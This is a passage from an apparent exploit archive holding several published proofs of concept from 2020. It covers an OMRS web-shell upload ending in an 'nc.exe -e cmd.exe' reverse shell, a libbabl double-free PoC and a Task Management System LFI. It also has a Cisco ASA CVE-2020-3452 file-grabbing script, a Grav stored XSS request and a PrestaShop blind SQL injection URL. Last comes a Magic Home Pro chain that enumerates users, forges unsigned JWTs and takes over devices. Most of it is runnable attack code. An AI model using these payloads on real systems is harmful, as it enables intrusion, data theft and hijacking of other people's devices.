failure on libssh2 init\n"); goto shutdown; } fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1); printf("[+] ssh host fingerprint: "); for(i = 0; i < 20; i++) { printf("%02x", (unsigned char)fingerprint[i]); } printf("\n"); libssh2_knownhost_free(nh); signal(SIGINT,&on_interrupt); libssh2_userauth_keyboard_interactive(session, "", &kbd_callback); printf("[!] exploit failed, core maybe on target!\n"); shutdown: if(sd){ close(sd); } printf("\e[0m"); return -2; }
-
Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2)
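# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020-12-14
# Exploit Author: Andrea Bruschi - www.andreabruschi.net
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 / Xampp Server and Wamp Server
#!/usr/bin/python3
"""OMRS 1.0 authenticated RCE.

Flow: log in as a registered user -> upload nc.exe and a PHP web shell through
the marriage registration form (the form does not reject them) -> find the
names the application stored them under -> copy them to stable names via the
web shell -> start a local listener -> have the target run nc.exe back to us.
"""
import requests
import sys
import os
# iterm2/AppKit exist only on macOS with pyobjc; they are needed solely by
# start_listener(), so their absence must not stop the rest of the script
# (start the nc listener by hand in that case).
try:
    import iterm2
    import AppKit
except ImportError:
    iterm2 = None
    AppKit = None

# CONFIGURE HERE
reverse_ip = '192.168.xx.xx'
reverse_port = 4444

# CONFIGURE HERE
# SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL
netcat_path = '/local/path/to/nc.exe'
shell_path = '/local/path/to/shell.php'

# seconds to wait for the target on the non-blocking requests
TIMEOUT = 30


def login(url, mobile, password):
    """Log in and return the PHPSESSID cookie value.

    Exits with a message when no PHPSESSID comes back (wrong URL, server down)
    instead of the original bare KeyError. NOTE: PHP issues PHPSESSID on any
    session_start(), so a cookie alone does not prove the credentials were
    accepted -- a bad login surfaces later when the upload is rejected.
    """
    login_url = "{}/user/login.php".format(url)
    payload = {'mobno': mobile, 'password': password, 'login': ''}
    req = requests.post(login_url, data=payload, timeout=TIMEOUT)
    cookie = req.cookies.get('PHPSESSID')
    if not cookie:
        sys.exit('[-] No PHPSESSID cookie in the login response (check the URL)')
    return cookie


def upload(url, cookie, file=None):
    """Upload the local file *file* as the 'husimage' field of the registration form.

    Only the base name is sent as the multipart filename (the original sent the
    whole local path). The other form fields are filler the form insists on.
    Raises ValueError when *file* is empty.
    """
    if not file:
        raise ValueError('upload() needs a local file path')
    filename = os.path.basename(file)
    ext = os.path.splitext(filename)[1]
    content_type = 'application/octet-stream' if "exe" in ext else 'application/x-php'
    cookies = {'PHPSESSID': cookie}
    form_url = "{}/user/marriage-reg-form.php".format(url)
    payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''}
    with open(file, 'rb') as fh:  # closed even when the POST fails
        files = {
            'husimage': (filename, fh, content_type, {'Expires': '0'}),
            'wifeimage': ('test.jpg', '', 'image/jpeg'),
        }
        req = requests.post(form_url, data=payload, cookies=cookies, files=files, timeout=TIMEOUT)
    if req.ok:
        print(f'[+] File {ext} uploaded')
    else:
        print(f'[-] Upload of {filename} answered HTTP {req.status_code}')


def get_remote_file(url, ext):
    """Return the server-side name of the uploaded file ending in *ext*.

    Same heuristic as before: the 42 characters preceding the first occurrence
    of *ext* in the directory listing of /user/images. This presumes directory
    listing is enabled and that the application renames uploads to a fixed
    42-character name -- verify both against the target if it misfires.
    Exits when *ext* does not occur in the listing at all.
    """
    listing_url = "{}/user/images".format(url)
    req = requests.get(listing_url, timeout=TIMEOUT)
    before, found, _ = req.text.partition(ext)
    if not found:
        sys.exit(f'[-] No {ext} file in {listing_url} (directory listing disabled?)')
    return before[-42:] + ext


def persistence(url, webshell, netcat):
    """Copy the renamed uploads to the stable names shell.php and nc.exe via the web shell.

    The command goes in the `cmd` query parameter; `params=` makes requests
    URL-encode it instead of relying on the raw string surviving.
    """
    shell_url = "{}/user/images/{}".format(url, webshell)
    requests.get(shell_url, params={'cmd': "copy /y {} shell.php".format(webshell)}, timeout=TIMEOUT)
    requests.get(shell_url, params={'cmd': "copy /y {} nc.exe".format(netcat)}, timeout=TIMEOUT)
    print('[+] Persistence enabled')


def get_reverse(url, ip, port):
    """Make the target run nc.exe back to ip:port with cmd.exe attached.

    No timeout on purpose: the request stays open for as long as the shell is
    alive, exactly as in the original.
    """
    payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port)
    print('[+] Reverse shell incoming!')
    requests.get("{}/user/images/shell.php".format(url), params={'cmd': payload})


# CONFIGURE HERE
# THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER
# YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY
def start_listener(port):
    """Open an iTerm2 tab running `nc -lnv <port>` (macOS only).

    Prints a reminder and returns when the iterm2/AppKit modules are missing.
    """
    if iterm2 is None or AppKit is None:
        print(f'[!] iterm2/AppKit unavailable: start "nc -lnv {port}" manually')
        return
    # Launch the app
    AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2")

    async def main(connection):
        app = await iterm2.async_get_app(connection)
        window = app.current_window
        if window is not None:
            cmd = "nc -lnv {}".format(port)
            await window.async_create_tab(command=cmd)
        else:
            print("No current window")

    iterm2.run_until_complete(main)


if __name__ == "__main__":
    # original checked `len(sys.argv < 3)`, a TypeError; three arguments means argv has 4 entries
    if len(sys.argv) < 4:
        print("Usage: exploit.py <URI> <MOBILE> <PASSWORD>")
        sys.exit(1)
    url = sys.argv[1].rstrip('/')  # paths below start with "/"
    mobile = sys.argv[2]
    password = sys.argv[3]
    cookie = login(url, mobile, password)
    upload(url, cookie, netcat_path)
    upload(url, cookie, shell_path)
    webshell = get_remote_file(url, '.php')
    netcat = get_remote_file(url, '.exe')
    persistence(url, webshell, netcat)
    start_listener(reverse_port)
    get_reverse(url, reverse_ip, reverse_port)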
-
libbabl 0.1.62 - Broken Double Free Detection (PoC)
# Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC)
# Date: December 14, 2020
# Exploit Author: Carter Yagemann
# Vendor Homepage: https://www.gegl.org
# Software Link: https://www.gegl.org/babl/
# Version: libbabl 0.1.62 and newer
# Tested on: Debian Buster (Linux 4.19.0-9-amd64)
# Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c

/*
 * babl wraps every buffer handed out by babl_malloc() / taken back by babl_free()
 * in a small header (from babl-memory.c):
 *
 * typedef struct
 * {
 *   char *signature;
 *   size_t size;
 *   int (*destructor)(void *ptr);
 * } BablAllocInfo;
 *
 * `signature` records whether the chunk came from babl at all and, if so,
 * whether it is live or already freed: it points at the global string
 * "babl-memory" while allocated and at "So long and thanks for all the fish."
 * once freed (babl-memory.c:44).
 *
 * babl_free() compares against that marker to catch a double free
 * (babl-memory.c:173):
 *
 * void
 * babl_free (void *ptr,
 *            ...)
 * {
 *   ...
 *   if (freed == BAI (ptr)->signature)
 *     fprintf (stderr, "\nbabl:double free detected\n");
 *
 * The check is defeated by babl's own allocator choice: the header is part of
 * a chunk obtained from libc malloc(), and libc free() stores its own
 * free-list bookkeeping inside freed chunks. On most systems that bookkeeping
 * lands on top of `signature` (presumably the free-list pointer at the start of
 * the chunk -- verify against your libc), so after the first babl_free() the
 * field matches neither marker. The second babl_free() therefore reports an
 * "unknown" pointer instead of the double free it actually is.
 *
 * Build note: if your toolchain links with --as-needed (Ubuntu's default), put
 * -lbabl-0.1 after the source file or the library is dropped.
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <babl/babl-memory.h>

/* Free the same babl chunk twice and watch stderr: expected "double free
 * detected", observed "unknown pointer". Always exits successfully. */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;

    void *chunk = babl_malloc(42);
    babl_free(chunk);
    /* BUG: the second free below is clearly a double free, yet babl only
     * reports an "unknown" pointer because its signature was clobbered. */
    babl_free(chunk);

    return EXIT_SUCCESS;
}
-
Task Management System 1.0 - 'page' Local File Inclusion
# Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion
# Exploit Author: İsmail BOZKURT
# Date: 2020-12-15
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Windows 10 x86_64

Step 1. Log into the application with valid credentials.
Step 2. Click on Branch.
Step 3. Select New Branch; the browser is now at http://127.0.0.1/index.php?page=index
Step 4. Change "index" to ../../../c:/xampp/apache/bin/php.ini%00

Note: the trailing %00 (null byte) is what cuts off the hard-coded ".php" suffix, and PHP rejects null bytes in include paths from 5.3.4 onward (the author lists "php version < 5.3.3"), so the php.ini example only works on such old builds. On newer PHP the `page` parameter is still unsanitised: the directory traversal works, but because both the file_exists() check and the include append ".php", only files that already end in .php can be included.

Vulnerable code (the page dispatcher reached through index.php?page=): the parameter goes straight into include() with no allowlist and no path normalisation.

section class="content">
<div class="container-fluid">
<?php
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
if(!file_exists($page.".php")){
    include '404.html';
}else{
    include $page.'.php';
}
?>
-
Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
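# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
# Date: 12 Dec 2020
# Exploit Author: Freakyclown@cygenta.co.uk
# Vendor Homepage: cisco.com
# Software Link: It’s against Hardware, specifically ASA’s and FTD’s
# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD’s (versions 6.2.3 to 6.6.0.1)
# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
# CVE : CVE-2020-3452
# Github : https://github.com/cygenta/CVE-2020-3452

import os
import sys

import requests

# Written by freakyclown for @CygentaHQ
# Cisco ASA Path Traversal
# CVE-2020-3452
# Usage: CVE-2020-3452.py {target}"
# Example: CVE-2020-3452.py 192.168.0.12"
# Requires - Requests - pip3 install requests
#
# This tool takes advantage of the above cve and attempts to
# download files as listed below, it is suggested that you make
# a working folder for the outputfiles to avoid confusion if
# attacking mutliple ASA's

# seconds to wait per request; an unresponsive box no longer hangs the run
TIMEOUT = 20

# the target is always contacted with verify=False (appliances use self-signed
# certificates), so silence the per-request InsecureRequestWarning
try:
    requests.packages.urllib3.disable_warnings()
except AttributeError:
    pass


def grabstuff(target=None, files=None):
    """Pull each name in *files* from *target* via the CVE-2020-3452 traversal
    and save it under that name in the current directory.

    target: IP or hostname; prompted for when None (the original behaviour).
    files:  iterable of names relative to +CSCOE+/; defaults to the module-level
            `files` set below. Iterated in sorted order so runs are repeatable.
    Responses are written as bytes in "wb" mode, so binary files such as
    logo.gif are no longer mangled by text-mode decoding. Non-200 answers and
    empty bodies are skipped rather than saved as files. A 200 carrying an
    HTML error page is still written -- inspect the output.
    """
    if target is None:
        target = input("Enter target IP/Url: ")
    if files is None:
        files = globals()['files']
    for name in sorted(files):
        print("trying: ", name)
        # set request parameters
        params = (
            ('type', 'mst'),
            ('textdomain', '+CSCOE+/' + name),  # the file we want, under the +CSCOE+ web directory
            ('default-language', ''),
            ('lang', '../'),                    # the traversal: escapes the translation-table directory
        )
        # ignoring ssl cert problems on purpose: appliances present self-signed certificates
        response = requests.get('https://' + target + '/+CSCOT+/translation-table', params=params, verify=False, timeout=TIMEOUT)
        if response.status_code != 200 or not response.content:
            print("  skipped: HTTP", response.status_code, "with", len(response.content), "bytes")
            continue
        # write the file to the disk; basename keeps the output inside the working folder
        with open(os.path.basename(name), "wb") as fh:
            fh.write(response.content)


# this is a list of files available to download, more will be added in time
# if anyone has a list of ASA files, I'd be happy to add here
files = {
    "sess_update.html", "blank.html", "noportal.html", "portal_ce.html", "portal.html",
    "logon_custom.css", "svc.html", "logo.gif", "portal_inc.lua", "nostcaccess.html",
    "session.js", "portal.js", "portal_custom.css", "running.conf", "tlbrportal_forms.js",
    "logon_forms.js", "win.js", "portal.css", "lced.html", "pluginlib.js", "useralert.html",
    "ping.html", "app_index.html", "shshimdo_url", "session_password.html", "relayjar.html",
    "relayocx.html", "color_picker.js", "color_picker.html", "cedhelp.html", "cedmain.html",
    "cedlogon.html", "cedportal.html", "portal_elements.html", "commonspawn.js", "common.js",
    "appstart.js", "relaymonjar.html", "relaymonocx.html", "cedsave.html", "tunnel_linux.jnlp",
    "ask.html", "no_svc.html", "preview.html", "cedf.html", "ced.html", "logon_redirect.html",
    "logout.html", "tunnel_mac.jnlp", "gp-gip.html", "auth.html", "wrong_url.html", "logon.html",
}


if __name__ == "__main__":
    # accept the target on the command line as the usage comment says; fall back to the prompt
    target = sys.argv[1] if len(sys.argv) > 1 else input("Enter target IP/Url: ")
    # obvious thing is obvious, try the things and barf if fail
    try:
        grabstuff(target)
    except Exception as err:
        print("Something went wrong sorry")
        print(type(err).__name__, err)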
-
Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting
# Exploit Title: Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting
# Date: 13-12-2020
# Exploit Author: Sagar Banwa
# Vendor Homepage: https://getgrav.org/
# Software Link: https://getgrav.org/downloads
# Version: Grav v1.6.30 - Admin v1.9.18
# Tested on: Windows 10/Kali Linux
# Contact: https://www.linkedin.com/in/sagarbanwa/

Steps to reproduce:
1) Log in to the grav-admin panel.
2) Go to Pages.
3) Click Add.
4) The "Add Page" dialog opens.
5) Fill in the following details:
   Page Title : <script>alert(1337)</script>
   Folder Name : sagar_Banwa
   Parent Page : /(root)
   Page Template : Default
   Value : yes (sent as data[visible]=1 in the request below)
6) Click the Save button.
7) Click Pages again.
8) The new page is listed with the title <script>alert(1337)</script> rendered unescaped.
9) Click the eye (preview) button, or simply open http://127.0.0.1/grav-admin/ -- the alert fires.

The payload is stored in the page title, so it runs for whoever later loads the admin Pages list or the dashboard, not only for the account that planted it. The raw request below carries that account's own session cookies and a current admin-nonce; both are session-bound, so capture your own rather than replaying these values.

-------------------------------------
POST /grav-admin/admin/pages HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 230
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/grav-admin/admin/pages
Cookie: grav-site-a4a23f1-admin=ehrcji8qpnu8e50r839r4oe2on; grav-site-a4a23f1=u5438b49fft2b5d7610a53ne1d; grav-tabs-state={%22tab-options.routes.registration.Security%22:%22data.Security%22%2C%22tab-content.options.advanced%22:%22data.content%22}
Upgrade-Insecure-Requests: 1

data%5Btitle%5D=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&data%5Bfolder%5D=sagar_banwa&data%5Broute%5D=%2F&data%5Bname%5D=default&data%5Bvisible%5D=1&data%5Bblueprint%5D=&task=continue&admin-nonce=d488c0d8bdaf2978d50f174942d5279f
-----------------------------
-
PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
# Date: 2020-12-15
# Exploit Author: Frederic ADAM
# Author contact: contact@fadam.eu
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://github.com/PrestaShop/productcomments
# Version: 4.2.0
# Tested on: Debian 10
# CVE : CVE-2020-26248

Injection point (the value is passed as an element of the id_products[] array, hence the %5B%5D):

http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]

Example -- the response is delayed by roughly 2 seconds when the injection succeeds, which is how this blind injection is confirmed; nothing is reflected in the page itself:

http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)
-
Magic Home Pro 1.5.1 - Authentication Bypass
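# Exploit Title: Magic Home Pro 1.5.1 - Authentication Bypass
# Google Dork: NA
# Date: 22 October 2020
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
# Author Github Page: https://9lyph.github.io/CVE-2020-27199/
# Vendor Homepage: http://www.zengge.com/appkzd
# Software Link: https://play.google.com/store/apps/details?id=com.zengge.wifi&hl=en
# Version: 1.5.1 (REQUIRED)
# Tested on: Android 10

## Enumeration ##

import requests
import json
import os
from colorama import init
from colorama import Fore, Back, Style
import re

'''
1. First Stage Authentication
2. Second Stage Enumerate
3. Third Stage Remote Execute
'''

# MACs for which the backend returned a bound user (filled by Main())
found_macaddresses = []
outtahere = ""
q = "q"

API = "https://wifij01us.magichue.net/app"
TIMEOUT = 15  # seconds per request
# a device address is exactly 12 hex digits, no separators (compared lower-cased)
MAC_RE = re.compile(r'[0-9a-f]{12}$')


def _headers(token=None):
    """Headers that mimic the Android app. `token` is the login JWT; omitted when None (login request)."""
    headers = {
        "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json",
        "Content-Type": "application/json; charset=utf-8",
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate",
    }
    if token is not None:
        headers["token"] = token
    return headers


def _send_command(target, token, hex_data, verb):
    """POST one raw device command (`hex_data`) for device `target` through the cloud relay.

    The backend answers with a JSON body containing "true" on success; the
    outcome is printed, nothing is returned (as before). `verb` is "On"/"Off"
    and only affects the messages.
    """
    array = {"dataCommandItems": [{"hexData": hex_data, "macAddress": target}]}
    print(Fore.WHITE + "[+] Sending Payload ...")
    response = requests.post(API + "/sendCommandBatch/ZG001", data=json.dumps(array), headers=_headers(token), timeout=TIMEOUT)
    if response.status_code == 200:
        if "true" in response.text:
            print(Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + f" Switched {verb}")
        else:
            print(Fore.RED + f"[-] Failed to switch {verb.lower()} Endpoint " + Style.RESET_ALL + f"{target}")


def turnOn(target, token):
    """Switch `target` on (command 71230fa3) using the caller's session token."""
    _send_command(target, token, "71230fa3", "On")


def turnOff(target, token):
    """Switch `target` off (command 71240fa4). The failure message now says "off" (was a copy-paste "on")."""
    _send_command(target, token, "71240fa4", "Off")


def lighItUp(target, token):
    """Interactive on/off loop for one device; 0 = on, 1 = off, q/Q = quit.

    `target` must be exactly 12 hex digits; anything else is reported and no
    request is sent (the original silently ignored malformed input of 12+ chars).
    """
    if len(str(target)) < 12 or not MAC_RE.match(target.lower()):
        print(Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
        return
    choice = ""
    while choice.lower() != q.lower():
        if choice == "0":
            turnOn(target, token)
        elif choice == "1":
            turnOff(target, token)
        choice = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)


def Main(macbase="C82E475DCE", last_bytes=range(256)):
    """Log in, then ask the backend who owns macbase + each candidate last byte.

    getBindedUserListByMacAddress answers for addresses the caller does not own,
    which is the information leak this stage abuses. Credentials come from the
    MAGICHOME_USER / MAGICHOME_PASS environment variables; the placeholders
    below are used when they are unset. Hits go to the terminal and to loot.txt
    (plain text -- the ANSI colour codes are no longer written to the file).

    Fix: the original built the last byte with "%02d" for 0..99, i.e. decimal
    digits only, which skipped every value containing A-F (156 of 256).
    """
    data = {
        "userID": os.environ.get("MAGICHOME_USER", "<Valid Registered Email/Username>"),
        "password": os.environ.get("MAGICHOME_PASS", "<Valid Registered Password>"),
        "clientID": ""
    }
    # First Stage Authenticate
    os.system('clear')
    print(Fore.WHITE + "[+] Authenticating ...")
    response = requests.post(API + "/login/ZG001", json=data, headers=_headers(), timeout=TIMEOUT)
    token = response.json().get('token')
    if not token:
        print(Fore.RED + "[-] Login failed: no token in the response (check credentials)" + Style.RESET_ALL)
        return
    # Second Stage Enumerate
    print(Fore.WHITE + "[+] Enumerating ...")
    candidates = [macbase + "%02X" % x for x in last_bytes]
    with open('loot.txt', 'w') as f:
        for mac in candidates:
            response = requests.get(API + "/getBindedUserListByMacAddress/ZG001", params={"macAddress": mac}, headers=_headers(token), timeout=TIMEOUT)
            data = response.json().get('data')
            if not data:
                continue
            found_macaddresses.append(mac)
            owner = data[0]
            line = f"[*] MAC Address Identified: {mac}, User: {owner['userName']}, Unique ID: {owner['userUniID']}, Binded ID: {owner['bindedUniID']}"
            print(Fore.GREEN + line + Style.RESET_ALL)
            f.write(line + "\n")
    print(Style.RESET_ALL)
    if not found_macaddresses:
        print(Fore.RED + "[-] No MAC addresses retrieved")
        return
    # Third Stage Remote Execute
    attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
    if attackboolean.upper() == 'Y':
        target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
        lighItUp(target, token)
    elif attackboolean.upper() == 'N':
        print(Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t." + Style.RESET_ALL)
    else:
        print(Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)


if __name__ == "__main__":
    Main()

## Token Forging ##

#!/usr/local/bin/python3
import url64
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re
import time
from wsgiref.handlers import format_date_time
from datetime import datetime
from time import mktime

now = datetime.now()
stamp = mktime(now.timetuple())

'''
HTTP/1.1 200
Server: nginx/1.10.3
Content-Type: application/json;charset=UTF-8
Connection: close

"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
'''

# The original hard-coded loginDate/refreshDate/expireDate as fixed
# millisecond timestamps (Oct 2020, +120 days, +180 days). They are now derived
# from the current time with the same spacing, so the forged token never
# carries an already-past expireDate should the backend look at it.
_MS_PER_DAY = 24 * 60 * 60 * 1000


def Usage():
    print(f"Usage: {sys.argv[0]} <username> <unique id>")


def Main(user, uniqid):
    """Print a fake /app/login/ZG001 response whose token is unsigned (alg "None").

    The token is header.payload. with an empty signature; the backend accepted
    such tokens, which is the bypass. The surrounding JSON mirrors the real
    reply so it can be served to the app in place of the genuine one (e.g. from
    an intercepting proxy). User-supplied values are JSON-encoded instead of
    being spliced into the strings raw.
    """
    os.system('clear')
    print("[+] Encoding ...")
    print("[+] Bypass header created!")
    print("HTTP/1.1 200")
    print("Server: nginx/1.10.3")
    print("Date: " + str(format_date_time(stamp)))
    print("Content-Type: application/json;charset=UTF-8")
    print("Connection: close\r\n\r\n")
    login_ms = int(time.time() * 1000)
    jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
    jwt_data = json.dumps({
        "userID": user,
        "uniID": uniqid,
        "cdpid": "ZG001",
        "clientID": "",
        "serverCode": "US",
        "expireDate": login_ms + 180 * _MS_PER_DAY,
        "refreshDate": login_ms + 120 * _MS_PER_DAY,
        "loginDate": login_ms,
    })
    jwt_headerEncoded = url64.encode(jwt_header.strip())
    jwt_dataEncoded = url64.encode(jwt_data.strip())
    # trailing "." = empty signature
    jwtcombined = jwt_headerEncoded.strip() + "." + jwt_dataEncoded.strip() + "."
    body = {
        "code": 0,
        "msg": "",
        "data": {
            "webApi": "wifij01us.magichue.net/app",
            "webPathOta": "http://wifij01us.magichue.net/app/ota/download",
            "tcpServerController": "TCP,8816,ra8816us02.magichue.net",
            "tcpServerBulb": "TCP,8815,ra8815us02.magichue.net",
            "tcpServerControllerOld": "TCP,8806,mhc8806us.magichue.net",
            "tcpServerBulbOld": "TCP,8805,mhb8805us.magichue.net",
            "sslMqttServer": "ssl://192.168.0.112:1883",
            "serverName": "Global",
            "serverCode": "US",
            "userName": user,
            "userEmail": user,
            "userUniID": uniqid,
        },
        "token": jwtcombined,
    }
    print(json.dumps(body, separators=(',', ':')))


if __name__ == "__main__":
    if len(sys.argv) < 3:
        Usage()
    else:
        Main(sys.argv[1], sys.argv[2])

## Device Takeover PoC ##

#!/usr/local/bin/python3
import url64
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re


def Usage():
    print(f"Usage: {sys.argv[0]} <attacker email> <target email> <target mac address> <target forged token>")


def Main():
    """Share the victim's device with the attacker account, authenticated as the victim.

    argv: attacker email, target email, target MAC, forged token. The forged token
    (from the token-forging script) is what identifies the victim to the backend;
    the target email argument is kept only to preserve the command line.
    """
    attacker_email = sys.argv[1]
    target_email = sys.argv[2]  # informational; the token carries the victim identity
    target_mac = sys.argv[3]
    forged_token = sys.argv[4]
    os.system('clear')
    print(Fore.WHITE + "[+] Sending Payload ...")
    url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"
    data = json.dumps({"friendUserID": attacker_email, "macAddress": target_mac})
    headers = {
        "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json",
        "Content-Type": "application/json; charset=utf-8",
        "token": forged_token,
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }
    response = requests.post(url, data=data, headers=headers, timeout=15)
    if response.status_code == 200:
        if "true" in response.text:
            print(Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
        else:
            print(Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)
    else:
        print(Fore.RED + f"[-] Unexpected HTTP {response.status_code} from shareDevice" + Style.RESET_ALL)


if __name__ == "__main__":
    if len(sys.argv) < 5:
        Usage()
    else:
        Main()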